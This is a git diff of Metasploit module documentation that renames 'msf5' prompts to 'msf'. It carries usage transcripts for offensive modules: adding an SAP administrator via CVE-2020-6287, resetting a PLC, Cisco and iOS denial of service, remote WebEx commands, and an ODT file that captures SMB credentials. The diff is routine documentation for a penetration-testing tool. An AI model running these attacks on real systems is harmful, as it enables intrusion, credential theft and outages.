/tmp/juniper_ex root@metasploit-dev:~/metasploit-framework# ./msfconsole [*] Starting persistent handler(s)... -msf5 > use auxiliary/admin/networking/gather/juniper_config -msf5 auxiliary(admin/networking/gather/juniper_config) > set config /tmp/juniper_ex2200.config +msf > use auxiliary/admin/networking/gather/juniper_config +msf auxiliary(admin/networking/gather/juniper_config) > set config /tmp/juniper_ex2200.config config => /tmp/juniper_ex2200.config -msf5 auxiliary(admin/networking/gather/juniper_config) > set rhost 127.0.0.1 +msf auxiliary(admin/networking/gather/juniper_config) > set rhost 127.0.0.1 rhost => 127.0.0.1 -msf5 auxiliary(admin/networking/gather/juniper_config) > run +msf auxiliary(admin/networking/gather/juniper_config) > run [*] Running module against 127.0.0.1 [*] Importing config @@ -1069,14 +1069,14 @@ root@metasploit-dev:~/metasploit-framework# wget -o /dev/null -O /tmp/screenos.c root@metasploit-dev:~/metasploit-framework# ./msfconsole [*] Starting persistent handler(s)... -msf5 > use auxiliary/admin/networking/gather/juniper_config -msf5 auxiliary(admin/networking/gather/juniper_config) > set config /tmp/screenos.conf +msf > use auxiliary/admin/networking/gather/juniper_config +msf auxiliary(admin/networking/gather/juniper_config) > set config /tmp/screenos.conf config => /tmp/screenos.conf -msf5 auxiliary(admin/networking/gather/juniper_config) > set rhost 127.0.0.1 +msf auxiliary(admin/networking/gather/juniper_config) > set rhost 127.0.0.1 rhost => 127.0.0.1 -msf5 auxiliary(admin/networking/gather/juniper_config) > set action SCREENOS +msf auxiliary(admin/networking/gather/juniper_config) > set action SCREENOS action => SCREENOS -msf5 auxiliary(admin/networking/gather/juniper_config) > run +msf auxiliary(admin/networking/gather/juniper_config) > run [*] Running module against 127.0.0.1 [*] Importing config diff --git a/documentation/modules/auxiliary/admin/networking/ubiquiti_config.md b/documentation/modules/auxiliary/admin/networking/ubiquiti_config.md index 623ff64a1f..1a783aaf74 100644 --- a/documentation/modules/auxiliary/admin/networking/ubiquiti_config.md +++ b/documentation/modules/auxiliary/admin/networking/ubiquiti_config.md @@ -64,9 +64,9 @@ resource (unifi_config.rb)> run resource (unifi_config.rb)> use auxiliary/admin/networking/ubiquiti_config resource (unifi_config.rb)> set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 auxiliary(admin/networking/ubiquiti_config) > set config /root/.msf4/loot/db +msf auxiliary(admin/networking/ubiquiti_config) > set config /root/.msf4/loot/db config => /root/.msf4/loot/db -msf5 auxiliary(admin/networking/ubiquiti_config) > run +msf auxiliary(admin/networking/ubiquiti_config) > run [*] Running module against 127.0.0.1 [*] Converting config BSON to JSON diff --git a/documentation/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.md b/documentation/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.md index 3900f4f3a7..0f095c802c 100644 --- a/documentation/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.md +++ b/documentation/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.md @@ -40,18 +40,18 @@ From the documentation: Example: Adding a new user `metasploit` with the `Administrator` role: ``` -msf5 > use auxiliary/admin/sap/cve_2020_6287_ws_add_user -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set RHOSTS netweaver.lan +msf > use auxiliary/admin/sap/cve_2020_6287_ws_add_user +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set RHOSTS netweaver.lan RHOSTS => netweaver.lan -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set USERNAME metasploit +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set USERNAME metasploit USERNAME => metasploit -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set PASSWORD 0pe3nS3sam3 +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set PASSWORD 0pe3nS3sam3 PASSWORD => 0pe3nS3sam3 -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > check +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > check [+] 192.168.53.183:50000 - The target is vulnerable. -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set VERBOSE true +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set VERBOSE true VERBOSE => true -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run [*] Running module against 192.168.53.183 [*] Starting the PCK Upgrade job... @@ -63,27 +63,27 @@ msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run [+] Successfully added the role to the new user [*] Canceling the PCK Upgrade job... [*] Auxiliary module execution completed -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > ``` Example: Removing the user `metasploit`: ``` -msf5 > use auxiliary/admin/sap/cve_2020_6287_ws_add_user -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set RHOSTS netweaver.lan +msf > use auxiliary/admin/sap/cve_2020_6287_ws_add_user +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set RHOSTS netweaver.lan RHOSTS => netweaver.lan -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set USERNAME metasploit +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set USERNAME metasploit USERNAME => metasploit -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set PASSWORD 0pe3nS3sam3 +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set PASSWORD 0pe3nS3sam3 PASSWORD => 0pe3nS3sam3 -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set ACTION REMOVE +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set ACTION REMOVE ACTION => REMOVE -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run [*] Running module against 192.168.53.183 [+] Successfully deleted the user account [*] Auxiliary module execution completed -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > ``` [1]: https://aws.amazon.com/marketplace/seller-profile?id=56cbce49-5486-4a83-a6b7-0fea3841da1b diff --git a/documentation/modules/auxiliary/admin/scada/pcom_command.md b/documentation/modules/auxiliary/admin/scada/pcom_command.md index e239c1f765..829a74c781 100755 --- a/documentation/modules/auxiliary/admin/scada/pcom_command.md +++ b/documentation/modules/auxiliary/admin/scada/pcom_command.md @@ -11,8 +11,8 @@ ## Scenarios ``` -msf5 > use auxiliary/admin/scada/pcom_command -msf5 auxiliary(admin/scada/pcom_command) > show options +msf > use auxiliary/admin/scada/pcom_command +msf auxiliary(admin/scada/pcom_command) > show options Module options (auxiliary/admin/scada/pcom_command): @@ -23,12 +23,12 @@ Module options (auxiliary/admin/scada/pcom_command): RPORT 20256 yes The target port (TCP) UNITID 0 no Unit ID (0 - 127) -msf5 auxiliary(admin/scada/pcom_command) > set RHOST 192.168.1.1 +msf auxiliary(admin/scada/pcom_command) > set RHOST 192.168.1.1 RHOST => 192.168.1.1 -msf5 auxiliary(admin/scada/pcom_command) > run +msf auxiliary(admin/scada/pcom_command) > run [*] 192.168.1.1:20256 - Sending RESET command [*] 192.168.1.1:20256 - Command accepted [*] Auxiliary module execution completed -msf5 auxiliary(admin/scada/pcom_command) > +msf auxiliary(admin/scada/pcom_command) > ``` diff --git a/documentation/modules/auxiliary/admin/smb/webexec_command.md b/documentation/modules/auxiliary/admin/smb/webexec_command.md index 8ccd18499a..d0c65fe35e 100644 --- a/documentation/modules/auxiliary/admin/smb/webexec_command.md +++ b/documentation/modules/auxiliary/admin/smb/webexec_command.md @@ -29,17 +29,17 @@ ### Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86 ``` - msf5 > use auxiliary/admin/smb/webexec_command - msf5 auxiliary(admin/smb/webexec_command) > set rhosts 192.168.37.136 + msf > use auxiliary/admin/smb/webexec_command + msf auxiliary(admin/smb/webexec_command) > set rhosts 192.168.37.136 rhosts => 192.168.37.136 - msf5 auxiliary(admin/smb/webexec_command) > set smbuser a_user + msf auxiliary(admin/smb/webexec_command) > set smbuser a_user smbuser => a_user - msf5 auxiliary(admin/smb/webexec_command) > set smbpass password + msf auxiliary(admin/smb/webexec_command) > set smbpass password smbpass => password - msf5 auxiliary(admin/smb/webexec_command) > run + msf auxiliary(admin/smb/webexec_command) > run [+] 192.168.37.136:445 - Command completed! [*] 192.168.37.136:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed - msf5 auxiliary(admin/smb/webexec_command) > + msf auxiliary(admin/smb/webexec_command) > ``` diff --git a/documentation/modules/auxiliary/admin/wemo/crockpot.md b/documentation/modules/auxiliary/admin/wemo/crockpot.md index a4115725c1..f698a8f390 100644 --- a/documentation/modules/auxiliary/admin/wemo/crockpot.md +++ b/documentation/modules/auxiliary/admin/wemo/crockpot.md @@ -38,22 +38,22 @@ functionality. Set this only if you're SURE you want to proceed. ## Usage ``` -msf5 > use auxiliary/admin/wemo/crockpot -msf5 auxiliary(admin/wemo/crockpot) > set rhosts 10.22.22.1 +msf > use auxiliary/admin/wemo/crockpot +msf auxiliary(admin/wemo/crockpot) > set rhosts 10.22.22.1 rhosts => 10.22.22.1 -msf5 auxiliary(admin/wemo/crockpot) > set temp High +msf auxiliary(admin/wemo/crockpot) > set temp High temp => High -msf5 auxiliary(admin/wemo/crockpot) > set time 1 +msf auxiliary(admin/wemo/crockpot) > set time 1 time => 1 -msf5 auxiliary(admin/wemo/crockpot) > set defangedmode false +msf auxiliary(admin/wemo/crockpot) > set defangedmode false defangedmode => false -msf5 auxiliary(admin/wemo/crockpot) > set verbose true +msf auxiliary(admin/wemo/crockpot) > set verbose true verbose => true -msf5 auxiliary(admin/wemo/crockpot) > run +msf auxiliary(admin/wemo/crockpot) > run [+] Wemo-enabled Crock-Pot detected [*] Cooking on High for 1m [+] Cook time set to 1m [*] Auxiliary module execution completed -msf5 auxiliary(admin/wemo/crockpot) > +msf auxiliary(admin/wemo/crockpot) > ``` diff --git a/documentation/modules/auxiliary/analyze/crack_mobile.md b/documentation/modules/auxiliary/analyze/crack_mobile.md index fb48f790ae..bd3bc3c23f 100644 --- a/documentation/modules/auxiliary/analyze/crack_mobile.md +++ b/documentation/modules/auxiliary/analyze/crack_mobile.md @@ -151,11 +151,11 @@ creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging. ``` -msf5 post(android/gather/hashdump) > creds add user:androidsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-sha1 -msf5 post(android/gather/hashdump) > previous -msf5 auxiliary(analyze/crack_mobile) > set showcommand true +msf post(android/gather/hashdump) > creds add user:androidsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-sha1 +msf post(android/gather/hashdump) > previous +msf auxiliary(analyze/crack_mobile) > set showcommand true showcommand => true -msf5 auxiliary(analyze/crack_mobile) > run +msf auxiliary(analyze/crack_mobile) > run [+] hashcat Version Detected: v5.1.0 [*] Hashes Written out to /tmp/hashes_tmp20191112-9775-19hbg7j @@ -189,14 +189,14 @@ nvmlDeviceGetFanSpeed(): Not Supported Create a password with each type, passwords are all `1234`. ``` -msf5 > creds add user:samsungsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-samsung-sha1 -msf5 > creds add user:androidsha1 hash:9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 jtr:android-sha1 -msf5 > creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 jtr:android-md5 +msf > creds add user:samsungsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-samsung-sha1 +msf > creds add user:androidsha1 hash:9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 jtr:android-sha1 +msf > creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 jtr:android-md5 ``` ``` -msf5 > use auxiliary/analyze/crack_mobile -msf5 auxiliary(analyze/crack_mobile) > run +msf > use auxiliary/analyze/crack_mobile +msf auxiliary(analyze/crack_mobile) > run [+] hashcat Version Detected: v5.1.0 [*] Hashes Written out to /tmp/hashes_tmp20191113-29506-1xydi7 diff --git a/documentation/modules/auxiliary/cloud/aws/enum_ec2.md b/documentation/modules/auxiliary/cloud/aws/enum_ec2.md index 414ba5c3eb..8936aa08d0 100644 --- a/documentation/modules/auxiliary/cloud/aws/enum_ec2.md +++ b/documentation/modules/auxiliary/cloud/aws/enum_ec2.md @@ -41,7 +41,7 @@ This module authenticates to AWS EC2 (Elastic Compute Cloud) to identify compute ### Provided a valid 'access key ID' and 'secret access key' with sufficient privileges ``` -msf5 auxiliary(cloud/aws/enum_iam) > run +msf auxiliary(cloud/aws/enum_iam) > run [+] Found 3 users. [+] User Name: test1 @@ -89,29 +89,29 @@ msf5 auxiliary(cloud/aws/enum_iam) > run ### Provided an invalid or inactive 'access key ID' ``` -msf5 auxiliary(cloud/aws/enum_iam) > run +msf auxiliary(cloud/aws/enum_iam) > run [-] Auxiliary aborted due to failure: unexpected-reply: The security token included in the request is invalid. [*] Auxiliary module execution completed -msf5 auxiliary(cloud/aws/enum_iam) > +msf auxiliary(cloud/aws/enum_iam) > ``` ### Provided an invalid 'secret access key' ``` -msf5 auxiliary(cloud/aws/enum_iam) > run +msf auxiliary(cloud/aws/enum_iam) > run [-] Auxiliary aborted due to failure: unexpected-reply: The request signature we calculated does not match the signature you provided. Check your AWS Secret Access Key and signing method. Consult the service documentation for details. [*] Auxiliary module execution completed -msf5 auxiliary(cloud/aws/enum_iam) > +msf auxiliary(cloud/aws/enum_iam) > ``` ### Provided an 'access key ID' or 'secret access key' with insufficient privileges ``` -msf5 auxiliary(cloud\aws\enum_ec2) > run +msf auxiliary(cloud\aws\enum_ec2) > run [-] Auxiliary aborted due to failure: unexpected-reply: User: arn:aws:iam::899712345657:user/test1 is not authorized to perform: iam:ListUsers on resource: arn:aws:iam::899712345657:user/ [*] Auxiliary module execution completed -msf5 auxiliary(cloud\aws\enum_ec2) > +msf auxiliary(cloud\aws\enum_ec2) > ``` diff --git a/documentation/modules/auxiliary/cloud/aws/enum_iam.md b/documentation/modules/auxiliary/cloud/aws/enum_iam.md index 776adb7e2a..e9ad8068a4 100644 --- a/documentation/modules/auxiliary/cloud/aws/enum_iam.md +++ b/documentation/modules/auxiliary/cloud/aws/enum_iam.md @@ -54,7 +54,7 @@ This module authenticates to AWS IAM (Identify Access Module) to identify user a ### Provided a valid 'access key ID' and 'secret access key' with sufficient privileges ``` -msf5 auxiliary(cloud/aws/enum_ec2) > run +msf auxiliary(cloud/aws/enum_ec2) > run [*] Found 0 instances in eu-north-1 [*] Found 0 instances in ap-south-1 @@ -78,25 +78,25 @@ msf5 auxiliary(cloud/aws/enum_ec2) > run [+] Private IP: 18.236.87.255 (ip-172-31-30-21.us-west-2.compute.internal) [+] Security Group: sg-0d52cc35aaf82aff5 [*] Auxiliary module execution completed -msf5 auxiliary(cloud/aws/enum_ec2) > +msf auxiliary(cloud/aws/enum_ec2) > ``` ### Provided an invalid or inactive 'access key ID', or an invalid 'secret access key' ``` -msf5 auxiliary(cloud\aws\enum_ec2) > run +msf auxiliary(cloud\aws\enum_ec2) > run [-] Auxiliary aborted due to failure: unexpected-reply: AWS was not able to validate the provided access credentials [*] Auxiliary module execution completed -msf5 auxiliary(cloud\aws\enum_ec2) > +msf auxiliary(cloud\aws\enum_ec2) > ``` ### Provided an 'access key ID' or 'secret access key' with insufficient privileges ``` -msf5 auxiliary(cloud\aws\enum_ec2) > run +msf auxiliary(cloud\aws\enum_ec2) > run [-] Auxiliary aborted due to failure: unexpected-reply: You are not authorized to perform this operation. [*] Auxiliary module execution completed -msf5 auxiliary(cloud\aws\enum_ec2) > +msf auxiliary(cloud\aws\enum_ec2) > ``` diff --git a/documentation/modules/auxiliary/cloud/aws/enum_s3.md b/documentation/modules/auxiliary/cloud/aws/enum_s3.md index c38d9a381f..0fcba2ef75 100644 --- a/documentation/modules/auxiliary/cloud/aws/enum_s3.md +++ b/documentation/modules/auxiliary/cloud/aws/enum_s3.md @@ -47,7 +47,7 @@ This module authenticates to AWS S3 (Simple Storage Service), to identify bucket ### Provided a valid 'access key ID' and 'secret access key' with sufficient privileges ``` -msf5 auxiliary(cloud/aws/enum_s3) > run +msf auxiliary(cloud/aws/enum_s3) > run [+] Found 1 buckets. [+] Name: asoto-secret-demo-bucket [+] Creation Date: 2019-06-13 23:30:26 UTC @@ -61,35 +61,35 @@ msf5 auxiliary(cloud/aws/enum_s3) > run [*] [*] Done. [*] Auxiliary module execution completed -msf5 auxiliary(cloud/aws/enum_s3) > exit +msf auxiliary(cloud/aws/enum_s3) > exit ``` ### Provided an invalid or inactive 'access key ID' ``` -msf5 auxiliary(cloud/aws/enum_s3) > run +msf auxiliary(cloud/aws/enum_s3) > run [-] Auxiliary aborted due to failure: unexpected-reply: The AWS Access Key Id you provided does not exist in our records. [*] Auxiliary module execution completed -msf5 auxiliary(cloud/aws/enum_s3) > +msf auxiliary(cloud/aws/enum_s3) > ``` ### Provided an invalid 'secret access key' ``` -msf5 auxiliary(cloud/aws/enum_s3) > run +msf auxiliary(cloud/aws/enum_s3) > run [-] Auxiliary aborted due to failure: unexpected-reply: The request signature we calculated does not match the signature you provided. Check your key and signing method. [*] Auxiliary module execution completed -msf5 auxiliary(cloud/aws/enum_s3) > +msf auxiliary(cloud/aws/enum_s3) > ``` ### Provided an 'access key ID' or 'secret access key' with insufficient privileges ``` -msf5 auxiliary(cloud/aws/enum_s3) > run +msf auxiliary(cloud/aws/enum_s3) > run [-] Auxiliary aborted due to failure: unexpected-reply: Access Denied [*] Auxiliary module execution completed -msf5 auxiliary(cloud/aws/enum_s3) > +msf auxiliary(cloud/aws/enum_s3) > ``` diff --git a/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md b/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md index 5dfbac0edc..a4413cc268 100644 --- a/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md +++ b/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md @@ -18,10 +18,10 @@ The device will "re-spring" the operating system, but not actually restart the d ### Safari 602.1 on iOS 10.1.1 ``` -msf5 > use auxiliary/dos/apple_ios/webkit_backdrop_filter_blur -msf5 auxiliary(dos/apple_ios/webkit_backdrop_filter_blur) > set URIPATH / +msf > use auxiliary/dos/apple_ios/webkit_backdrop_filter_blur +msf auxiliary(dos/apple_ios/webkit_backdrop_filter_blur) > set URIPATH / URIPATH => / -msf5 auxiliary(dos/apple_ios/webkit_backdrop_filter_blur) > run +msf auxiliary(dos/apple_ios/webkit_backdrop_filter_blur) > run [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.0.1:8080/ diff --git a/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos.md b/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos.md index e684133f89..38964cb0b4 100644 --- a/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos.md +++ b/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos.md @@ -29,10 +29,10 @@ #### Successful Scenario: ``` -msf5 > use auxiliary/dos/cisco/cisco_7937G_dos -msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209 +msf > use auxiliary/dos/cisco/cisco_7937G_dos +msf auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209 rhost => 192.168.110.209 -msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run +msf auxiliary(dos/cisco/cisco_7937G_dos) > run [*] Starting server... [*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3) @@ -54,10 +54,10 @@ msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run #### Unsuccessful Scenario: ``` -msf5 > use auxiliary/dos/cisco/cisco_7937G_dos -msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209 +msf > use auxiliary/dos/cisco/cisco_7937G_dos +msf auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209 rhost => 192.168.110.209 -msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run +msf auxiliary(dos/cisco/cisco_7937G_dos) > run [*] Starting server... [-] 192.168.110.209 - Device doesn't appear to be functioning (already dos'd?) or SSH is not enabled. @@ -68,10 +68,10 @@ msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run #### Successful Scenario: ``` -msf5 > use auxiliary/dos/cisco/cisco_7937G_dos -msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209 +msf > use auxiliary/dos/cisco/cisco_7937G_dos +msf auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209 rhost => 192.168.110.209 -msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run +msf auxiliary(dos/cisco/cisco_7937G_dos) > run [*] Starting server... [*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3) @@ -93,10 +93,10 @@ msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run #### Unsuccessful Scenario: ``` -msf5 > use auxiliary/dos/cisco/cisco_7937G_dos -msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209 +msf > use auxiliary/dos/cisco/cisco_7937G_dos +msf auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209 rhost => 192.168.110.209 -msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run +msf auxiliary(dos/cisco/cisco_7937G_dos) > run [*] Starting server... [-] 192.168.110.209 - Device doesn't appear to be functioning (already dos'd?) or SSH is not enabled. diff --git a/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.md b/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.md index d6731f4ed4..9e563aab63 100644 --- a/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.md +++ b/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.md @@ -28,10 +28,10 @@ ### Cisco 7937G Running Firmware Version SCCP-1-4-5-7 ``` -msf5 > use auxiliary/dos/cisco/cisco_7937g_dos_reboot -msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209 +msf > use auxiliary/dos/cisco/cisco_7937g_dos_reboot +msf auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209 rhost => 192.168.110.209 -msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run +msf auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run [*] Starting server... [*] 192.168.110.209 - Sending DoS Packets. Stand by. @@ -42,10 +42,10 @@ msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run ### Cisco 7937G Running Firmware Version SCCP-1-4-5-5 ``` -msf5 > use auxiliary/dos/cisco/cisco_7937g_dos_reboot -msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209 +msf > use auxiliary/dos/cisco/cisco_7937g_dos_reboot +msf auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209 rhost => 192.168.110.209 -msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run +msf auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run [*] Starting server... [*] 192.168.110.209 - Sending DoS Packets. Stand by. diff --git a/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md b/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md index 3e166c0db5..6dbc7c6714 100644 --- a/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md +++ b/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md @@ -31,7 +31,7 @@ On some devices the Spectrum Analysis web service runs on port `8080`, though Ly ## Scenarios ``` -msf5 auxiliary(dos/http/cable_haunt_websocket_dos) > run +msf auxiliary(dos/http/cable_haunt_websocket_dos) > run [*] Running module against 192.168.100.1 [*] Attempting Connection to 192.168.100.1 diff --git a/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md b/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md index f960f2fcd6..1547dc1b2c 100644 --- a/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md +++ b/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md @@ -55,12 +55,12 @@ Check the box saying: ```Enable web server on port:...``` ### WINDOWS 7/10 ``` -msf5 > use auxiliary/dos/http/flexense_http_server_dos -msf5 auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27 +msf > use auxiliary/dos/http/flexense_http_server_dos +msf auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27 rhost => 192.168.1.27 -msf5 auxiliary(dos/http/flexense_http_server_dos) > set rport 80 +msf auxiliary(dos/http/flexense_http_server_dos) > set rport 80 rport => 80 -msf5 auxiliary(dos/http/flexense_http_server_dos) > run +msf auxiliary(dos/http/flexense_http_server_dos) > run [*] 192.168.1.20:80 - Triggering the vulnerability [+] 192.168.1.20:80 - DoS successful 192.168.1.20 is down ! diff --git a/documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md b/documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md index 8f44caf777..b976d8e67d 100644 --- a/documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md +++ b/documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md @@ -26,7 +26,7 @@ ## Scenarios ``` -msf5 auxiliary(dos/http/metasploit_httphandler_dos) > run +msf auxiliary(dos/http/metasploit_httphandler_dos) > run [*] Running module against 127.0.0.1 [*] 127.0.0.1:8080 - Sending DoS packet... diff --git a/documentation/modules/auxiliary/dos/tcp/claymore.md b/documentation/modules/auxiliary/dos/tcp/claymore.md index 001513efdd..db0eed44f3 100644 --- a/documentation/modules/auxiliary/dos/tcp/claymore.md +++ b/documentation/modules/auxiliary/dos/tcp/claymore.md @@ -16,8 +16,8 @@ Claymore Dual GPU Miner<=10.5 ### Claymore Dual GPU Miner/10.0 - window7 ``` -msf5 > use auxiliary/dos/tcp/claymore_dos -msf5 auxiliary(dos/tcp/claymore_dos) > show options +msf > use auxiliary/dos/tcp/claymore_dos +msf auxiliary(dos/tcp/claymore_dos) > show options Module options (auxiliary/dos/tcp/claymore_dos): @@ -26,9 +26,9 @@ Module options (auxiliary/dos/tcp/claymore_dos): rhost yes The target address rport 3333 yes The target port -msf5 auxiliary(dos/tcp/claymore_dos) > set rhost 127.0.0.1 +msf auxiliary(dos/tcp/claymore_dos) > set rhost 127.0.0.1 rhost => 127.0.0.1 -msf5 auxiliary(dos/tcp/claymore_dos) > run +msf auxiliary(dos/tcp/claymore_dos) > run [*] Starting server... [*] Creating sockets... diff --git a/documentation/modules/auxiliary/fileformat/odt_badodt.md b/documentation/modules/auxiliary/fileformat/odt_badodt.md index e2b66dc06f..8d8945da5a 100644 --- a/documentation/modules/auxiliary/fileformat/odt_badodt.md +++ b/documentation/modules/auxiliary/fileformat/odt_badodt.md @@ -47,14 +47,14 @@ set LISTENER 192.168.1.25 Install LibreOffice 6.03 or Apache OpenOffice 4.1.5 on a Windows workstation. (Note: This attack does not work against Mac or Linux versions.) ``` - msf5 > use auxiliary/fileformat/odt_badodt - msf5 auxiliary(fileformat/odt_badodt) > set FILENAME salary.odt + msf > use auxiliary/fileformat/odt_badodt + msf auxiliary(fileformat/odt_badodt) > set FILENAME salary.odt FILENAME => salary.odt - msf5 auxiliary(fileformat/odt_badodt) > set LHOST 192.168.1.25 + msf auxiliary(fileformat/odt_badodt) > set LHOST 192.168.1.25 LHOST => 192.168.1.25 - msf5 auxiliary(fileformat/odt_badodt) > set CREATOR A_USER + msf auxiliary(fileformat/odt_badodt) > set CREATOR A_USER CREATOR => A_USER - msf5 auxiliary(fileformat/odt_badodt) > exploit + msf auxiliary(fileformat/odt_badodt) > exploit [*] Generating Malicious ODT File [*] SMB Listener Address will be set to 192.168.1.25 @@ -67,13 +67,13 @@ On an attacker workstation, use a tool to serve and capture an SMB share on port ``` $ sudo ./msfconsole - msf5 > use auxiliary/server/capture/smb - msf5 auxiliary(server/capture/smb) > run + msf > use auxiliary/server/capture/smb + msf auxiliary(server/capture/smb) > run [*] Auxiliary module running as background job 0. - msf5 auxiliary(server/capture/smb) > + msf auxiliary(server/capture/smb) > [*] Server started. - msf5 auxiliary(server/capture/smb) > + msf auxiliary(server/capture/smb) > ``` Leave the metasploit SMB server listening while the user opens the document. Upon opening the ODT file, the user workstation will attempt to connect (and authenticate) to the attacker workstation: diff --git a/documentation/modules/auxiliary/gather/c2s_dvr_password_disclosure.md b/documentation/modules/auxiliary/gather/c2s_dvr_password_disclosure.md index 7b4fd5396e..b6cc0c5514 100644 --- a/documentation/modules/auxiliary/gather/c2s_dvr_password_disclosure.md +++ b/documentation/modules/auxiliary/gather/c2s_dvr_password_disclosure.md @@ -65,7 +65,7 @@ if ($Q::page == 2) { [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed [*] Starting persistent handler(s)... - msf5 auxiliary(gather/c2s_dvr_password_disclosure) > creds + msf auxiliary(gather/c2s_dvr_password_disclosure) > creds Credentials =========== diff --git a/documentation/modules/auxiliary/gather/cisco_rv320_config.md b/documentation/modules/auxiliary/gather/cisco_rv320_config.md index d1383e70b9..6506dff8b9 100644 --- 